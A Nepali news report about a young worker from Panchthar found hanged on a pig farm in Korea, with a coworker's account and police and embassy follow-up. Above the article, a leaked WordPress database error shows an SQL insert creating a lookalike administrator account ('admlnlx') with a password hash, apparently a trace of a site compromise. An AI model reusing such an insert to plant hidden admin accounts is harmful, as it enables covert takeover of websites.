WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEpVjO2v/BpUSzsUp0CeSwKdzN8Y1N0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 16:03:12', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाण्डौ । कोरियामा कार्यरत पाँचथरका एक युवक झुण्डिएको अवस्थामा फेला परेका छन ।
कोरियामा ईपिएस भिषाबाट साढे दुई बर्षदेखी बंगुर फार्ममा काम गर्दै आएका पाँचथरका विवेक राई शनिबार राति फार्म भित्रै डोरी लगाएर झुण्डिएको अवस्थामा फेला परेको मृतकसँगै एकै कम्पनीमा कार्यरत डम्बर थाम्सुहाङले बताएका छन ।
खाना खाएर सँगै सुतेका राई राती बाहिर निस्कीएको आफुले थाहा नपाएको भन्दै थाम्सुहाङले बताए । घटनाको मुख्य कारण के हो भन्ने बारेमा विस्तृत जानाकारी आउन बाकी नै छ । प्रहरीले अनुसन्धान गरिरहेको जानकारी पाएइको छ । दुताबास श्रोतले घट्नाबारे बुझेर कानुनी प्रकृया लगायत दुताबासले गर्नुपर्ने सबै काम लगत्तै गर्ने आश्वासन दिएको छ ।